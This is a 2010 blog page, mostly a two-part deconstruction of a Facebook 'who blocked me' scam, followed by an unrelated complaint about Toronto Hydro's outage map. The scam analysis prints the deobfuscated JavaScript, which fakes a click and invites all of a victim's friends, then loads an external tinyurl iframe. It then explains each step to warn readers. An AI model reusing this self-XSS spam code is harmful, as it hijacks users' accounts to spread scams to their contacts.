Saturday, 10 July 2010

Deconstructing Facebook spam, Part 2

This is Part 2 of my look into some Facebook spam. First post is here.

Decyphering the code

I was bored, so I tried to decipher the code. What is this \x69\x6E\x6E\x65... stuff? Well, that's easy. It's the hexadecimal representation of the ASCII code for some letters/symbols. Decoding that isn't too difficult. Placing the JS function "alert();" around the text will pop up the text as the browser sees it (once it's decoded the hex into the actual letters.) Don't try it if you don't know how to quote it properly, though. We end up with something like this:

var _0x4168=["innerHTML","app104746576239621_body","getElementById",...];
var variables=[_0x4168[0],_0x4168[1], ...];
void (document[variables[2]](variables[1])[variables[0]]=variables[3]);
...

So there's the variable _0x4168 that contains an array of strings. The next variable variables is also an array of strings taken from the first. In fact, it's probably redundant. I guess it's to make it more obfuscated. Then there's some real code that references variables.

So let's replace all those variables references with the actual values, and we get something like this.

void (document["getElementById"]("app104746576239621_body")["innerHTML"]="<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=137354336277359\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss=document["getElementById"]("suggest");
var c=document["createEvent"]("MouseEvents");
...

OK, so one last strange thing. What's with this ["text"] stuff? It turns out JS has this funky alternative to accessing class members. You can do it the normal way (object.member) or you can treat the object as a dictionary with the key being a string of the name of the member (object["member"]). So here's how the code finally ends up. I left out some other extras like the voids and provided some indenting.

document.getElementById("app104746576239621_body").innerHTML=
    "<a id=\"suggest\" href=\"#\"
        ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=137354336277359\"
        class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";
var ss=document.getElementById("suggest");
var c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
ss.dispatchEvent(c);
setTimeout(function (){
    fs.select_all();
}, 4000);
setTimeout(function (){
    SocialGraphManager.submitDialog("sgm_invite_form",
        "/ajax/social_graph/invite_dialog.php");
}, 5000);
document.getElementById("app104746576239621_body").innerHTML=
    "<iframe src=\"http://tinyurl.com/253qebf\"
        style=\"width: 800px; height: 600px;\"
        frameborder=0 scrolling=\"no\"></iframe>";

So what does it do?

We can go through this by each line (or something like a line):

  1. Look for a certain element on the page, and replace its "inner" HTML with a link called "Suggest to Friends!" with an ID of "suggest".
  2. Get the element with the ID of "suggest".
  3. Create a mouse event object.
  4. Initialize that event object for a click.
  5. Dispatch the event. This simulates a click on the previously created link.
  6. Call an anonymous function after 4 seconds. This function calls fs.select_all()
  7. Call another anonymous function after 5 seconds. This function calls SocialGraphManager.submitDialog.
  8. Look for a specific element on the page, and replace it with an iframe of a tinyurl.

So what does it really do?

It should make some sense now. As expected, it's a spammer. The first five steps basically load the "Suggest to Friends" page. It's a bit overly complex, but it gets you there (could have just set document.location to the URI). After four seconds, all your friends are selected, and one second later, the page is submitted, sending the suggestion to all your friends. Finally, it loads an iframe to replace the body section. The TinyURL is gone now, but it was a fake picture of Facebook, with a link that was the so-called second step.

In fact, that second link does go to a marginally legitimate page. It's a Greasemonkey script that periodically checks your friends list and tells you when someone disappears. Now, if you think about it, that really doesn't tell you if someone's blocked you. It tells you if someone removed you from their list. It tells you if someone closed their Facebook account. But it doesn't say anything about being blocked.

The interesting thing is how it gets you. You don't click a weird link, or anything. The user actually has to enter the JS themselves. Now sure, they don't know that, but it's still all them. That's all the more reason to get people a bit more educated when using computers.

Deconstructing Facebook spam

I split this into a couple posts because it's a bit long.

The Pitch

So someone (let's not point any fingers) "suggested" I might like "How to know who blocked me ?", a random Facebook Page. Now, ignoring the bad grammar, I took a look anyway. What we have is this lovely set of instructions:

OK, OK, wait... Those are the instructions? Seriously? Let's point out a few reasons why you probably shouldn't follow those instructions:

  1. Haven't you ever received an e-mail with a link (like an e-card, maybe)? It's always "Click link, or try copying this URL into your browser". Why are these instructions "backwards"?
  2. What kind of crazy jibberish link is that? OK, so to a lot of people, anything on a computer is jibberish, but this one's a whole different level of jibberish.
  3. It starts with "javascript:"!

So you don't know what that last point means? Basically, the part of the URI before the colon defines the protocol the browser uses to communicate with a server (the remote end). "http://" is a regular website, "https://" is a secure website, etc. On the other hand, "javascript:" means "treat the rest of the URI as JavaScript code". So by entering that code, you're really making the browser do who-knows-what. Granted, the instruction did say that it's code, and the step is to "Invite your friends", but why doesn't it use Facebook's standard invite display?

Many questions and oddities means you probably shouldn't do it. But not everyone notices those sorts of things.

Monday, 5 July 2010

About power outages, again

So in case you aren't in Toronto, we had a little bit of a power outage. Downtown, power went out about quarter to 5, though it didn't affect my work's building. But then when we got back home and I was watching Jeopardy!, the power went out in our area too. And it was out for about 1.75 hours, which I think is the longest (local) blackout I've experienced in Canada (barring the day-long one in 2003).

Now I'm sure you remember that previous post about power outages I made. The problem, of course, was that the Hydro One site didn't cover Toronto. Well, things have changed. Toronto Hydro now has a site for power outages.

Of course, there's a different problem now. It's totally broken. Or is it? I could access it with IE7 (which we're stuck with at work), but then it didn't work in Firefox at home. For me, that's basically broken. Had I not tried it at work, I would have dismissed it as useless.

Having peeked at the source of the website, I'm quite unimpressed. "JavaScript" / "javascript"? Capitalized HTML tags? <meta content="MSHTML 6.00.6000.16788" name="GENERATOR" />? Hello, Toronto Hydro? It's 2010. Who writes real websites in MS software? I'm surprised they even managed to get Google Maps there, with the junk they have for the rest of the site.

So apparently, they haven't heard of case-sensitivity (a symptom of living on Windows). The link on the main page uses ALLCAPS, which IE7 will ignore and lowercase, but Firefox doesn't. Then for whatever reason, their horrible JavaScript fails to load the Google Maps API. Sometimes it will pop up an error, but usually it just sits there with a big blank space where the map should be. If you lowercase the URI and go to that in Firefox, then it all loads fine (the link above is already corrected.)

And then you go a little further through the source... and what's this? The map data for outages is inlined in the webpage? That explains why it goes and refreshes the entire page every once in a while. You wouldn't do that with proper AJAX.

Technical reasons aside, is it any good? Well, after seeing the HydroOne site, I wouldn't say so. It'd be nice to see the border of Toronto Hydro's jurisdiction, but that's kind of minor. Really though, it's just a map with some patterns on it, which tells you whether it's a big or small problem, but not much else. It says the "start of the outage", but not when it was fixed, or even if it was fixed. Unlike the HydroOne site, there's no indication whether repair crews have been dispatched, or whether the cause is known. Even better would be an estimate of how long it might be till the problem's fixed, though the HydroOne site doesn't seem to have that either. (I'm a bit jaded from the horrible code.)

Someone needs to go hit them on the head with some real Web 2.0 design, and then maybe think about what someone might want to know when the power goes out.